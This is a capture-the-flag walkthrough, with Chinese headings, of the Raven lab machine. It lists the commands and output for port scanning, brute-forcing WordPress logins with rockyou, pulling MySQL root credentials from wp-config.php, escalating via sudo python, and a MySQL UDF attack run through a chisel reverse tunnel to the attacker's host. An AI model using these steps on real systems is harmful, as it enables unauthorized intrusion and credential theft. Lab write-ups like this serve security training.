信息收集
| IP Address | Opening Ports |
|---|---|
| 192.168.101.159 | TCP: |
$ nmap -p- 192.168.101.159 --min-rate 1000 -sC -sV
bash
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey:
| 1024 26:81:c1:f3:5e:01:ef:93:49:3d:91:1e:ae:8b:3c:fc (DSA)
| 2048 31:58:01:19:4d:a2:80:a6:b9:0d:40:98:1c:97:aa:53 (RSA)
| 256 1f:77:31:19:de:b0:e1:6d:ca:77:07:76:84:d3:a9:a0 (ECDSA)
|_ 256 0e:85:71:a8:a2:c3:08:69:9c:91:c0:3f:84:18:df:ae (ED25519)
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-title: Raven Security
|_http-server-header: Apache/2.4.10 (Debian)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 37755/udp6 status
| 100024 1 46017/tcp6 status
| 100024 1 52049/udp status
|_ 100024 1 60004/tcp status
60004/tcp open status 1 (RPC #100024)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel本地权限
http://192.168.101.159/
$ dirb http://192.168.101.159
# echo '192.168.101.159 raven.local'>>/etc/hosts
$ wpscan --url http://raven.local/wordpress --enumerate u
usernames:michael,steven
$ wpscan --url http://raven.local/wordpress --usernames michael,steven --passwords /usr/share/wordlists/rockyou.txt
Username: steven, Password: pink84
$ ssh steven@192.168.101.159
Flag 1
$ cat /var/www/html/service.html
flag1{b9bbcb33e11b80be759c4e844862482d}
Flag 2
$ cat /var/www/flag2.txt
flag2{fc3fd58dcdad9ab23faca6e9a36e581c}
Flag 3
$ cat /var/www/html/wordpress/wp-config.php
username:root
password:R@v3nSecurity
$ mysql -uroot -p
mysql> use wordpress
mysql> select * from wp_posts\G;
flag3{afc01ab56b50591e7dccf93122770cd2}
权限提升
SUDO
$ sudo -l
$ sudo /usr/bin/python -c 'import pty;pty.spawn("/bin/bash")'
MYSQL:UDF:MSQP
利用MSQP检测权限提升
$ git clone https://github.com/MartinxMax/MSQP.git
$ python3 -m pip install mysql-connector-python
$ cd MSQP
首先kali开放服务端:
$ ./chisel server -p 8000 --reverse
启动客户端:
(target)$ ./chisel client 192.168.101.128:8000 R:localhost:3306
$ python3 msqp.py 127.0.0.1 3306 root R@v3nSecurity 192.168.101.128 100
Flag4
root@Raven:~# cat /root/flag4.txt
flag4{715dea6c055b9fe3337544932f2941ce}